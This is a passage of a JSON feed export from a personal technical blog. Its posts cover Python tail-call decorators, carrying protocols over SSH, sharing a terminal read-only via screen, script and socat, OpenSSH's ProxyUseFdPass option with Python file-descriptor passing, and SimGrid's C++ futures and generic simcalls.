from tco import tail_recursive, tail_call\n\n\n# Normal recursion depth maxes out at 980, this one works indefinitely\n@tail_recursive\ndef factorial(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    return tail_call(factorial)(n-1, accumulator=accumulator*n)\n\n\nprint(factorial(2000))\n
\n\n\n

With the implementation:

\n
class TailCall:\n    def __init__(self, f, args, kwargs):\n        self.f = f\n        self.args = args\n        self.kwargs = kwargs\n\n\ndef tail_call(f):\n    def wrapper(*args, **kwargs):\n        return TailCall(f, args, kwargs)\n    return wrapper\n\n\ndef tail_recursive(f):\n    def wrapper(*args, **kwargs):\n        func = f\n        while True:\n            res = func(*args, **kwargs)\n            if not isinstance(res, TailCall):\n                return res\n            args = res.args\n            kwargs = res.kwargs\n            if hasattr(res.f, \"__tc_original__\"):\n                func = getattr(res.f, \"__tc_original__\")\n            else:\n                func = res.f\n    wrapper.__tc_original__ = f\n    return wrapper\n
\n\n\n

This implementation does not use exceptions so we need to return the\nTailCall value (otherwise nothing happens).

\n

With this approach, we can have sibling TCO:

\n
from tco import tail_recursive, tail_call\n\n\n@tail_recursive\ndef factorial(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    return tail_call(factorial2)(n-1, accumulator=accumulator*n)\n\n\n@tail_recursive\ndef factorial2(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    return tail_call(factorial)(n-1, accumulator=accumulator*n)\n\n\nprint(factorial(2000))\n
\n\n\n

I tend to like the exception free-approach better. It might make the\ntyping system unhappy however.

\n

Sibling-call friendly version (with exceptions)

\n

Here's the same thing with exceptions:

\n
class TailCall(BaseException):\n    def __init__(self, f, args, kwargs):\n        self.f = f\n        self.args = args\n        self.kwargs = kwargs\n\n\ndef tail_call(f):\n    def wrapper(*args, **kwargs):\n        raise TailCall(f, args, kwargs)\n    return wrapper\n\n\ndef tail_recursive(f):\n    def wrapper(*args, **kwargs):\n        func = f\n        while True:\n            try:\n                return func(*args, **kwargs)\n            except TailCall as e:\n                args = e.args\n                kwargs = e.kwargs\n                if hasattr(e.f, \"__tc_original__\"):\n                    func = getattr(e.f, \"__tc_original__\")\n                else:\n                    func = e.f\n    wrapper.__tc_original__ = f\n    return wrapper\n
\n\n\n

I'm deriving TailCall from BaseException instead of Exception because\nthe tail-recursive functions might catch Exception which would break the\nTCO mechanism.

"}, {"id": "http://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "title": "Foo over SSH", "url": "https://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "date_published": "2017-08-02T00:00:00+02:00", "date_modified": "2017-08-02T00:00:00+02:00", "tags": ["computer", "network", "ssh", "unix"], "content_html": "

A comparison of the different solutions for using SSH2 as a secured\ntransport for protocols/services/applications.

\n

SSH-2 Protocol

\n

Overview

\n

The SSH-2 protocol uses its\nTransport Layer Protocol to provide\nencryption, confidentiality, server authentication and integrity over a\n(potentially) unsafe reliable bidirectional data stream (usually TCP port 22):

\n\n

Protocol stack:

\n
\n                                       [ session | forwarding ]\n[ SSH: Transport | SSH: Authentication | SSH: Connection      ]\n[ SSH: Binary Packet Protocol                                 ]\n[ SSH: Encryption                                             ]\n[ Underlying stream (eg. TCP)                                 ]\n
\n\n

Connection Protocol

\n

The Connection Protocol is used\nto manage channels\nand transfer data over them. Each channel is (roughly) a bidirectionnal\ndata stream:

\n\n

Multiple channels can be multiplexed over the same SSH connection:

\n
\nC \u2192 S CHANNEL_DATA(1, \"whoami\\n\")\nC \u2192 S CHANNEL_DATA(2, \"GET / HTTP/1.1\\r\\nHost: foo.example.com\\r\\n\\r\\n\")\nC \u2190 S CHANNEL_DATA(5, \"root\\n\")\nC \u2190 S CHANNEL_DATA(6, \"HTTP/1.1 200 OK\\r\\nContent-Type:text/plain\\r\\n\")\nC \u2190 S CHANNEL_DATA(6, \"Content-Length: 11\\r\\n\\r\\nHello World!\")\n
\n\n

Channels

\n

Session Channel

\n

A session channel is used to start:

\n\n

For session channels, the protocol has support for setting environment variables,\nallocating a server-side TTY, enabling X11 forwarding, notifying of the terminal\nsize modification (see SIGWINCH), sending signals, reporting the exit\nstatus or exit signal.

\n
\nC \u2192 S CHANNEL_OPEN(\"session\", 2, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(3, 6)\nC \u2192 S CHANNEL_REQUEST(6, \"pty-req\", TRUE, \"xterm\", 80, 120, \u2026)\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"env\", TRUE, \"LANG\", \"fr_FR.utf8\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"exec\", TRUE, \"ls /usr/\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2190 S CHANNEL_DATA(3, \"bin\\ngames\\ninclude\\nlib\\nlocal\\sbin\\nshare\\nsrc\\n\")\nC \u2190 S CHANNEL_EOF(3)\nC \u2190 S CHANNEL_REQUEST(3, \"exit-status\", FALSE, 0)\nC \u2190 S CHANNEL_CLOSE(3)\nC \u2192 S CHANNEL_CLOSE(6)\n
\n\n

Shell

\n

Shell session channels are used for interactive session are not really\nuseful for protocol encapsulation.

\n

Commands

\n

In SSH, a command is a single string.\nThis is not an array of strings (argv).\nOn a UNIX-ish system, the command is usually expected to be called by the user's\nshell (\"$SHELL\" -c \"$command\"): variable expansions, globbing are applied\nby the server-side shell.

\n
ssh foo.example.com 'ls *'\nssh foo.example.com 'echo $LANG'\nssh foo.example.com 'while true; do uptime ; sleep 60 ; done'\n
\n\n\n

Subsystems

\n

A subsystem is a \u201cwell-known\u201d service running on top of SSH. It is\nidentified by a string which makes it system independent: it does not\ndepend on the user/system shell, environment (PATH), etc.

\n

With the OpenSSH client, a subsystem can be invoked with\nssh -S $subsystem_name.

\n

Subsystem names come in\ntwo forms:

\n\n

Well-known subsystem names include:

\n\n

When using a subsystem:

\n\n

With the OpenSSH server, a command can be associated with a given\nsubsystem name with a configuration entry such as:

\n
Subsystem sftp /usr/lib/openssh/sftp-server\n
\n\n\n

The command is run under the identity of the user with its own shell\n(\"$SHELL\" -c \"$command\").

\n

If you want to connect to a socket you might use:

\n
Subsystem http socat STDIO TCP:localhost:80\nSubsystem hello@example.com socat STDIO UNIX:/var/run/hello\n
\n\n\n

It is possible to use exec to avoid keeping a shell process6:

\n
Subsystem http exec socat STDIO TCP:localhost:80\nSubsystem hello@example.com exec socat STDIO UNIX:/var/run/hello\n
\n\n\n

This works but OpenSSH complains because it checks for the existence of an\nexec executable file.

\n

Forwarding channels

\n

TCP/IP Forwarding

\n

The SSH has support for forwarding (either incoming or outgoing)\nTCP connections.

\n

Local forwarding is used to forward a local connection (or any\nother local stream) to a remote TCP endpoint. A channel of type\nforwarded-tcpip is opened to initiate a TCP connection on the remote\nside. This is used by ssh -L, ssh -W and ssh -D

\n
\nC \u2192 S CHANNEL_OPEN(\"direct-tcpip\", chan, \u2026, \"foo.example.com\", 9000, \"\", 0);\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\nC \u2192 S CHANNEL_DATA(chan2, \"aaa\")\n
\n\n

Remote forwarding is used to request to forward all incoming\nconnections on a remote port over the SSH connection. The remote side\nthen opens a new forwarded-tcpip channel for each connection. This\nis used by ssh -R.

\n
\nC \u2192 S      GLOBAL_REQUEST(\"tcpip-forward\", remote_addr, remote_port)\nC \u2190 S      REQUEST_SUCCESS(remote_port)\n    S \u2190 X  Incoming connection\nC \u2190 S      CHANNEL_OPEN(\"forwarded-tcpip\", chan, \u2026, address, port, peer_address, peer_port)\nC \u2192 S      CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\n    S \u2190 X  TCP Payload \"aaa\"\nS \u2190 X      CHANNEL_DATA(chan2, \"aaa\")\n
\n\n

Unix socket forwarding

\n

Since OpenSSH 6.7, it is\npossible to involve (either local or remote) UNIX sockets in forwards\n(ssh -L, ssh -R, ssh -W):

\n

Client support is needed when the UNIX socket is on the client-side\nbut server-side support is not needed.

\n

When the UNIX socket is on the server-side, both client\nand server support is needed. This is using a protocol extension\nwhich works similarly to the TCP/IP forwarding:

\n\n

TUN/TAP Forwarding

\n

As an extension, OpenSSH has support for tunnel forwarding. A tunnel\ncan be either Ethernet-based (TUN devices) or IP based (TAP devices).\nAs channels do not preserve message boundaries, a header is prepended\nto each message (Ethernet frame or IP packet respectively): this\nheader contains the message length (and for IP based tunnels, the address family).

\n

This is used by ssh -w.

\n

Messages for an IP tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, POINTOPOINT, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ip_packet)\n
\n\n

and the packets use the form:

\n
4B  packet length\n4B  address family (SSH_TUN_AF_INET or SSH_TUN_AF_INET6)\nvar data\n
\n\n\n

Messages for an Ethernet tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, ETHERNET, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ethernet_frame)\n
\n\n

and the packets use the form:

\n
4B  packet length\nvar data\n
\n\n\n

X11 forwarding

\n

The x11 channel type is used for\nX11 forwarding.

\n

Examples of applications working over SSH

\n

SCP

\n

scp uses SSH to spawn a remote-side scp process. This remote scp\nprocess communicates with the local instance using its stdin and\nstdout.

\n

When the local scp sends data, it spawns:

\n
scp -t /some_path/\n
\n\n\n

When the local scp receives data, it spawns:

\n
scp -f /some_path/some_file\n
\n\n\n

rsync

\n

rsync can work over SSH. In this mode of operation, it uses SSH to\nspawn a server rsync process which communicates with its stdin and\nstdout.

\n

The local rsync spawns something like in the remote side:

\n
rsync --server -e.Lsfx . /some_path/\n
\n\n\n

SFTP

\n

SFTP is a file transfer protocol.\nIt is expected to to work on top of SSH\nusing the sftp subsystem. However it can work on top of other streams\n(see sftp -S $program and sftp -D $program).

\n

This is not FTP running over SSH.

\n

FISH

\n

FISH\nis another solution for file system operation over a\nremote shell (such as rsh or ssh): it uses exec sessions to\nexecute standard UNIX commands on the remote side in order to do the\noperations. This first approach will not work if the remote side is\nnot a UNIXish system: in order to have support for non UNIX, it\nencodes the same requests as special comments at the beginning of the\ncommand.

\n

Git

\n

Git spawns a remote git-upload-pack /some_repo/ which communicates\nwith the local instance using its standard I/O.

\n

Systemd

\n

Many systemd *ctl tools (hostnamectl, busctl, localectl,\ntimedatectl, loginctl, systemctl) have builtin support for\nconnecting to a remote host. They use a ssh -xT $user@$host\nsystemd-stdio-bridge. This\ntool connects to the D-Bus\nsystem bus\n(i.e. ${DBUS_SYSTEM_BUS_ADDRESS:-/var/run/dbus/system_bus_socket}).

\n

Summary

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
ProgramSolution
scpCommand (scp)
rsyncCommand (rsync)
sftpSubsystem (sftp)
FISHCommands / special comments
gitCommand (git-upload-pack)
systemdCommand (systemd-stdio-bridge)
\n

Comparison of the different solutions for protocol transport

\n

Which solution should be used to export your own\nprotocol over SSH? The shell, X11 forwarding and TUN/TAP forwarding\nare not really relevant in this context so we're left with:

\n\n

Convenience

\n

Using a dedicated subsystem is the cleaner solution.\nThe subsystem feature of SSH has been designed for this kind of application:\nit's supposed to hide implementation details such as the shell,\nPATH, whether the service is exposed as a socket or a command,\nwhat is the location of the socket,\nwhether socat is installed on the system, etc.\nHowever with OpenSSH, installing a new subsystem is done by adding a new entry\nin the /etc/ssh/sshd_config file which is not so convenient for packaging\nand not necessarily ideal for configuration management.\nAn Include directive has been included for ssh_config\n(client configuration) in OpenSSH 7.3: the same directive for sshd_config\nwould probably be useful in this context.\nIn practice, the subsystem feature seems to be mostly used by sftp.

\n

Using a command is the simpler solution: the only requirement is to\nadd a suitable executable, preferably in the PATH. Moreover, the\nuser can add his/her own commands (or override the system ones) for his/her\nown purpose by adding executables in its own PATH.

\n

These two solutions have a few extra features which are not really\nnecessary when used as a pure stream transport protocol but might be\nhandy:

\n\n

The two forwarding solutions have fewer features which are more in\nline with what's expected of a stream transport but:

\n\n

Authentication and authorization

\n

The command and subsystem solutions run code with the user's identity\nand will by default run with the user permissions. The setuid and\nsetgid bits might be used if this is not suitable.

\n

Another solution is to use socat or netcat to connect to a socket and get\nthe same behavior as socket forwarding (security-wise).

\n

For Unix socket forwarding, OpenSSH uses the user identity to connect\nto the socket. The daemon can use SO_PEERCRED (on Linux, OpenBSD),\ngetpeereid()\n(on BSD),\ngetpeerucred()\n(Solaris) to get the user UID, GID in order to avoid a second\nauthentication. On Linux, file-system permissions can be used to\nrestrict the access to the socket as well.

\n

For TCP socket forwarding, OpenSSH uses the user identity to connect to\nthe socket and ident (on localhost) might be used in order to get\nthe user identity but this solution is not very pretty.

\n

Conclusion

\n

I kind-of like the subsystem feature even if it's not used that much.

\n

The addition of an Include directive in sshd_config might help deploying\nsuch services. Another interesting feature would be an option to associate a\nsubsystem with a Unix socket (without having to rely on socat).

\n

References

\n\n
\n
\n
    \n
  1. \n

    The receiver uses the\nSSH_MSG_CHANNEL_WINDOW_ADJUST\nmessage to request more data.\u00a0\u21a9

    \n
  2. \n
  3. \n

    The random padding is used to make the whole Binary Packet Protocol message\na multiple of the cipher block size (or 8 if the block size is smaller).\u00a0\u21a9

    \n
  4. \n
  5. \n

    This is used to transport both stdout (SSH_MSG_CHANNEL_DATA(channel, data))\nand stderr (SSH_MSG_CHANNEL_EXTENDED_DATA(channel, SSH_EXTENDED_DATA_STDERR, data))\nover the same session channel.\u00a0\u21a9

    \n
  6. \n
  7. \n

    Each channel is associated with two integer IDs, one for each side\nof the connection.\u00a0\u21a9

    \n
  8. \n
  9. \n

    It is currently not yet registered but it is described in the SFTP\ndrafts\nand widely deployed.\u00a0\u21a9

    \n
  10. \n
  11. \n

    bash already does an implicit exec when bash -c\n\"$a_single_command\" is used.\u00a0\u21a9

    \n
  12. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "title": "Terminal read-only live sharing", "url": "https://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "date_published": "2016-10-18T00:00:00+02:00", "date_modified": "2017-05-06T00:00:00+02:00", "tags": ["computer", "unix", "ssh", "screen"], "content_html": "

Live sharing a terminal session to another (shared) host over SSH in\nread-only mode.

\n

Update: 2017-05-06 add broadcastting over the web with\nnode-webterm

\n

TLDR

\n
#!/bin/sh\n\nhost=\"$1\"\n\nfile=script.log\ntouch \"$file\"\ntail -f $file | ssh $host 'cat > script.log' &\nscript -f \"$file\"\nkill %1\nssh $host \"rm $file\"\nrm \"$file\"\n
\n\n\n

Using screen

\n

screen can save the content of the screen session on a file. This is\nenabled with the following screen commands:

\n
logfile screen.log\nlogfile flush 0\nlog on\n
\n\n\n

The logfile flush 0 command removes the buffering delay in screen\nin order to reduce the latency.

\n

We can watch the session locally (from another terminal) with:

\n
tail -f screen.log\n
\n\n\n

This might produce some garbage if the original and target terminals are not\ncompatible (echo $TERM is different) or if the terminal sizes are different:

\n\n

Instead of watching it locally, we want to send the content to another (shared)\nhost over SSH:

\n
tail -f screen.log | ssh $server 'cat > /tmp/logfile'\n
\n\n\n

Other users can now watch the session on the remote host with:

\n
tail -f screen.log\n
\n\n\n

Using xterm

\n

You can create a log file from xterm:

\n
xterm -l -lf xterm.log\n
\n\n\n

The rest of the technique applies the same.

\n

Best viewed from an xterm-compatible terminal.

\n

Using script

\n

script can be used to create a log file as well:

\n
script -f script.log\n
\n\n\n

Downsides

\n

The downside is that a log file is created on both the local and server-side.\nThis might file grow (especially if you broadcast\nnyancat \"\ud83d\ude38\" for a long time)\nand need to be cleaned up afterwards.

\n

A FIFO might be used instead of a log file with some programs. It\nworks with screen and script but not with xterm. However, I\nexperienced quite a few broken pipes (and associated brokeness) when\ntrying to use this method. Moreover, using a FIFO can probably stall\nsome terminals if the consumer does not consume the data fast enough.

\n

Broadcast service

\n

In order to avoid the remote log file, a solution is to setup a terminal\nbroadcast service. A local terminal broadcast service can be set up with:

\n
socat UNIX-LISTEN:script.socket,fork SYSTEM:'tail -f script.log'\n
\n\n\n

And we can watch it with:

\n
socat STDIO UNIX-CONNECT:script.socket\n
\n\n\n

We can expose this service to a remote host over SSH:

\n
ssh $server -R script.socket:script.socket -N\n
\n\n\n

The downside of this approach is that the content is transfered over\nSSH once per viewer instead of only once.

\n

Web broadcast

\n

node-webterm can be used to\nbroadcast the log over HTTP:

\n
{\n    \"login\": \"tail -f script.log\",\n    \"port\": 3000,\n    \"interface\": \"127.0.0.1\",\n    \"input\": true\n}\n
\n\n\n

This displays the terminal in the browser using\nterminal.js, a JavaScript\nxterm-compatible terminal emulator (executing client-side).\nThe default terminal size is the same as the default xterm size.\nIt can be configured in index.html.

"}, {"id": "http://www.gabriel.urdhr.fr/2016/08/07/openssh-proxyusefdpass/", "title": "OpenSSH ProxyUseFdPass", "url": "https://www.gabriel.urdhr.fr/2016/08/07/openssh-proxyusefdpass/", "date_published": "2016-08-07T00:00:00+02:00", "date_modified": "2016-08-07T00:00:00+02:00", "tags": ["computer", "network", "system", "ssh", "python"], "content_html": "

While looking at the OpenSSH ssh_config manpage, I found the\nProxyUseFdpass configuration I did not know about. It's apparently\nnot widely known or used.

\n

Update 2017-08-02: netcat (nc) as an option to pass the created\ndescriptor using fdpass. In additional to the straightforward connect(),\nit can pass a file descriptor having initiated a connection through a SOCKS\nproxy (with -x proxy.example.com) or with HTTP connect\n(-x proxy.example.com -X connect).

\n

ProxyCommand

\n

OpenSSH client has a ProxyCommand configuration which can be used to\nuse a command as a transport to the server:

\n
\n

Specifies the command to use to connect to the server. The command\nstring extends to the end of the line, and is executed using the\nuser's shell \u2018exec\u2019 directive to avoid a lingering shell process.

\n
\n

Instead of opening a socket to the server itself, the OpenSSH client\nspawns the specified command and use its standard input and output to\ncommunicate with the server.

\n

The man page suggests to use (the OpenBSD variant of) netcat to connect\nthrough a HTTP (or SOCKS) proxy:

\n
\nProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p\n
\n\n

A typical usage is to use a relay/bastion/jump/gateway1 SSH\nserver with ssh -W2:

\n
\nHost gateway.example.com\nProxyCommand none\n\nHost *.example.com\nProxyCommand ssh gateway.example.com -W %h:%p\n
\n\n

ProxyUseFdPass

\n

While looking at the new ProxyJump configuration1, I found a\nProxyUseFdpass option which:

\n
\n

Specifies that ProxyCommand will pass a connected file descriptor\nback to ssh(1) instead of continuing to execute and pass data. The\ndefault is \u201cno\u201d.

\n
\n

When enabled, instead of communicating with the server through the\nProxyCommand standard input and output, the SSH client expects the\ncommand to give it a file descriptor to use. The idea is to avoid\nhaving a uncessary lingering process and extra write/reads when it is\nnot necessary3.

\n

The documentation does not explay how it's supposed to work exactly\nand I did not find any working example or any suggestion of a program\nwhich would be able to pass the file descriptor.

\n

The spawned command is expected to:

\n
    \n
  1. \n

    setup a file descriptor;

    \n
  2. \n
  3. \n

    send it to the client over its standard output (sendmsg with\n SCM_RIGHTS) with a on-byte message;

    \n
  4. \n
  5. \n

    exit(0).

    \n
  6. \n
\n

A minimal program which does the job is:

\n
#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport array\n\n# Create the file descriptor:\ns = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0)\ns.connect((sys.argv[1], int(sys.argv[2])))\n\n# Pass the file descriptor:\nfds = array.array(\"i\", [s.fileno()])\nancdata = [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)]\nsocket.socket(fileno = 1).sendmsg([b'\\0'], ancdata)\n
\n\n\n

Which can be used with:

\n
\nProxyCommand /path/to/passfd %h %p\nProxyUseFdpass yes\n
\n\n

It does not much. It creates a socket the same way the OpenSSH client\nwould have and pass it to the OpenSSH client. However, it can\nextended in order to do things such as:

\n\n

For testing purpose this receiving program can be used:

\n
#!/usr/bin/env python3\n\nimport os\nimport sys\nimport socket\nimport array\n\n(a, b) = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM, 0)\npid = os.fork()\n\ndef recv_fd(sock):\n    fds = array.array(\"i\")\n    cmsg_len = socket.CMSG_LEN(fds.itemsize)\n    msg, ancdata, flags, addr = sock.recvmsg(1, cmsg_len)\n    for cmsg_level, cmsg_type, cmsg_data in ancdata:\n        if (cmsg_level, cmsg_type) == (socket.SOL_SOCKET, socket.SCM_RIGHTS):\n            fds.fromstring(cmsg_data)\n            return fds[0]\n    sys.exit(1)\n\nif pid == 0:\n    # Exec specified command in the child:\n    a.close();\n    os.dup2(b.fileno(), 0)\n    os.dup2(b.fileno(), 1)\n    b.close()\n    os.execvp(sys.argv[1], sys.argv[1:])\nelse:\n    # Receive file descriptor and wait in the parent:\n    b.close();\n    s = recv_fd(a)\n    os.waitpid(pid, 0)\n    print(s)\n
\n\n\n

Which can be used as:

\n
fdrecv fdpass localhost 80\n
\n\n\n
\n
\n
    \n
  1. \n

    OpenSSH 7.3 includes\nspecial support for SSH jump servers with the ProxyJump\nconfiguration and -J flag.\u00a0\u21a9\u21a9

    \n
  2. \n
  3. \n

    It's often suggested to use this configuration instead:

    \n

    \nProxyCommand ssh gateway.example.com nc %h %p\n
    \n

    This requires netcat to be available on the server. ssh -W only\nneeds client-side support which is available in OpenSSH since\n5.4 (released in 2010)\nand the SSH server to accept TCP forwarding.\u00a0\u21a9

    \n
  4. \n
  5. \n

    It is not usable for an SSH jump server but can be used in\n simpler cases.\u00a0\u21a9

    \n
  6. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/08/01/simgrid-synchronisation/", "title": "C++ synchronisations for SimGrid", "url": "https://www.gabriel.urdhr.fr/2016/08/01/simgrid-synchronisation/", "date_published": "2016-08-01T00:00:00+02:00", "date_modified": "2016-08-01T00:00:00+02:00", "tags": ["computer", "simgrid", "c++", "future"], "content_html": "

This is an overview of some recent additions to the SimGrid code\nrelated to actor synchronisation. It might be interesting for people\nusing SimGrid, working on SimGrid or for people interested in generic\nC++ code for synchronisation or asynchronicity.

\n

SimGrid as a Discrete Event Simulator

\n

SimGrid is a discrete event simulator of\ndistributed systems: it does not simulate the world by small fixed-size steps\nbut determines the date of the next event (such as the end of a communication,\nthe end of a computation) and jumps to this date.

\n

A number of actors executing user-provided code run on top of the\nsimulation kernel1. When an actor needs to interact with the simulation\nkernel (eg. to start a communication), it issues a simcall\n(simulation call, an analogy to system calls) to the simulation kernel.\nThis freezes the actor until it is woken up by the simulation kernel\n(eg. when the communication is finished).

\n

The key ideas here are:

\n\n

Futures

\n

What is a future?

\n

We need a generic way to represent asynchronous operations in the\nsimulation kernel. Futures\nare a nice abstraction for this which have been added to a lot languages\n(Java, Python, C++ since C++11, ECMAScript, etc.)9.

\n

A future represents the result of an asynchronous operation. As the operation\nmay not be completed yet, its result is not available yet. Two different sort\nof APIs may be available to expose this future result:

\n\n

C++11 includes a generic class (std::future<T>) which implements a blocking API.\nThe continuation-based API\nis not available in the standard (yet) but is described in the\nConcurrency Technical\nSpecification.

\n

Which future do we need?

\n

We might want to use a solution based on std::future but our need is slightly\ndifferent from the C++11 futures. C++11 futures are not suitable for usage inside\nthe simulation kernel because they are only providing a blocking API\n(future.get()) whereas the simulation kernel cannot block.\nInstead, we need a continuation-based API to be used in our event-driven\nsimulation kernel.

\n

The C++ Concurrency TS describes a continuation-based API.\nOur future are based on this with a few differences5:

\n\n

Implementing Future

\n

The implementation of future is in simgrid::kernel::Future and\nsimgrid::kernel::Promise6 and is based on the Concurrency\nTS3:

\n

The future and the associated promise use a shared state defined with:

\n
enum class FutureStatus {\n  not_ready,\n  ready,\n  done,\n};\n\nclass FutureStateBase : private boost::noncopyable {\npublic:\n  void schedule(simgrid::xbt::Task<void()>&& job);\n  void set_exception(std::exception_ptr exception);\n  void set_continuation(simgrid::xbt::Task<void()>&& continuation);\n  FutureStatus get_status() const;\n  bool is_ready() const;\n  // [...]\nprivate:\n  FutureStatus status_ = FutureStatus::not_ready;\n  std::exception_ptr exception_;\n  simgrid::xbt::Task<void()> continuation_;\n};\n\ntemplate<class T>\nclass FutureState : public FutureStateBase {\npublic:\n  void set_value(T value);\n  T get();\nprivate:\n  boost::optional<T> value_;\n};\n\ntemplate<class T>\nclass FutureState<T&> : public FutureStateBase {\n  // ...\n};\ntemplate<>\nclass FutureState<void> : public FutureStateBase {\n  // ...\n};\n
\n\n\n

Both Future and Promise have a reference to the shared state:

\n
template<class T>\nclass Future {\n  // [...]\nprivate:\n  std::shared_ptr<FutureState<T>> state_;\n};\n\ntemplate<class T>\nclass Promise {\n  // [...]\nprivate:\n  std::shared_ptr<FutureState<T>> state_;\n  bool future_get_ = false;\n};\n
\n\n\n

The crux of future.then() is:

\n
template<class T>\ntemplate<class F>\nauto simgrid::kernel::Future<T>::thenNoUnwrap(F continuation)\n-> Future<decltype(continuation(std::move(*this)))>\n{\n  typedef decltype(continuation(std::move(*this))) R;\n\n  if (state_ == nullptr)\n    throw std::future_error(std::future_errc::no_state);\n\n  auto state = std::move(state_);\n  // Create a new future...\n  Promise<R> promise;\n  Future<R> future = promise.get_future();\n  // ...and when the current future is ready...\n  state->set_continuation(simgrid::xbt::makeTask(\n    [](Promise<R> promise, std::shared_ptr<FutureState<T>> state,\n         F continuation) {\n      // ...set the new future value by running the continuation.\n      Future<T> future(std::move(state));\n      simgrid::xbt::fulfillPromise(promise,[&]{\n        return continuation(std::move(future));\n      });\n    },\n    std::move(promise), state, std::move(continuation)));\n  return std::move(future);\n}\n
\n\n\n

We added a (much simpler) future.then_() method which does not\ncreate a new future:

\n
template<class T>\ntemplate<class F>\nvoid simgrid::kernel::Future<T>::then_(F continuation)\n{\n  if (state_ == nullptr)\n    throw std::future_error(std::future_errc::no_state);\n  // Give shared-ownership to the continuation:\n  auto state = std::move(state_);\n  state->set_continuation(simgrid::xbt::makeTask(\n    std::move(continuation), state));\n}\n
\n\n\n

The .get() delegates to the shared state. As we mentioned previously, an\nerror is raised if the future is not ready:

\n
template<class T>\nT simgrid::kernel::Future::get()\n{\n  if (state_ == nullptr)\n    throw std::future_error(std::future_errc::no_state);\n  std::shared_ptr<FutureState<T>> state = std::move(state_);\n  return state->get();\n}\n\ntemplate<class T>\nT simgrid::kernel::FutureState<T>::get()\n{\n  if (status_ != FutureStatus::ready)\n    xbt_die(\"Deadlock: this future is not ready\");\n  status_ = FutureStatus::done;\n  if (exception_) {\n    std::exception_ptr exception = std::move(exception_);\n    exception_ = nullptr;\n    std::rethrow_exception(std::move(exception));\n  }\n  xbt_assert(this->value_);\n  auto result = std::move(this->value_.get());\n  this->value_ = boost::optional<T>();\n  return std::move(result);\n}\n
\n\n\n

Generic simcalls

\n

Motivation

\n

Simcalls are not so easy to understand and adding a new one is not so easy\neither. In order to add one simcall, one has to first\nadd it to the list of simcalls\nwhich looks like this:

\n
# This looks like C++ but it is a basic IDL-like language\n# (one definition per line) parsed by a python script:\n\nvoid process_kill(smx_process_t process);\nvoid process_killall(int reset_pid);\nvoid process_cleanup(smx_process_t process) [[nohandler]];\nvoid process_suspend(smx_process_t process) [[block]];\nvoid process_resume(smx_process_t process);\nvoid process_set_host(smx_process_t process, sg_host_t dest);\nint  process_is_suspended(smx_process_t process) [[nohandler]];\nint  process_join(smx_process_t process, double timeout) [[block]];\nint  process_sleep(double duration) [[block]];\n\nsmx_mutex_t mutex_init();\nvoid        mutex_lock(smx_mutex_t mutex) [[block]];\nint         mutex_trylock(smx_mutex_t mutex);\nvoid        mutex_unlock(smx_mutex_t mutex);\n\n[...]\n
\n\n\n

At runtime, a simcall is represented by a structure containing a simcall\nnumber and its arguments (among some other things):

\n
struct s_smx_simcall {\n  // Simcall number:\n  e_smx_simcall_t call;\n  // Issuing actor:\n  smx_process_t issuer;\n  // Arguments of the simcall:\n  union u_smx_scalar args[11];\n  // Result of the simcall:\n  union u_smx_scalar result;\n  // Some additional stuff:\n  smx_timer_t timer;\n  int mc_value;\n};\n
\n\n\n

with the a scalar union type:

\n
union u_smx_scalar {\n  char            c;\n  short           s;\n  int             i;\n  long            l;\n  long long       ll;\n  unsigned char   uc;\n  unsigned short  us;\n  unsigned int    ui;\n  unsigned long   ul;\n  unsigned long long ull;\n  double          d;\n  void*           dp;\n  FPtr            fp;\n};\n
\n\n\n

Then one has to call (manually\"\ud83d\ude22\") a\nPython script\nwhich generates a bunch of C++ files:

\n\n

Then one has to write the code of the kernel side handler for the simcall\nand the code of the simcall itself (which calls the code-generated\nmarshaling/unmarshaling stuff)\"\ud83d\ude2d\".

\n

In order to simplify this process, we added two generic simcalls which\ncan be used to execute a function in the simulation kernel context:

\n
# This one should really be called run_immediate:\nvoid run_kernel(std::function<void()> const* code) [[nohandler]];\nvoid run_blocking(std::function<void()> const* code) [[block,nohandler]];\n
\n\n\n

Immediate simcall

\n

The first one (simcall_run_kernel()) executes a function in the simulation\nkernel context and returns immediately (without blocking the actor):

\n
void simcall_run_kernel(std::function<void()> const& code)\n{\n  simcall_BODY_run_kernel(&code);\n}\n\ntemplate<class F> inline\nvoid simcall_run_kernel(F& f)\n{\n  simcall_run_kernel(std::function<void()>(std::ref(f)));\n}\n
\n\n\n

On top of this, we add a wrapper which can be used to return a value of any\ntype and properly handles exceptions:

\n
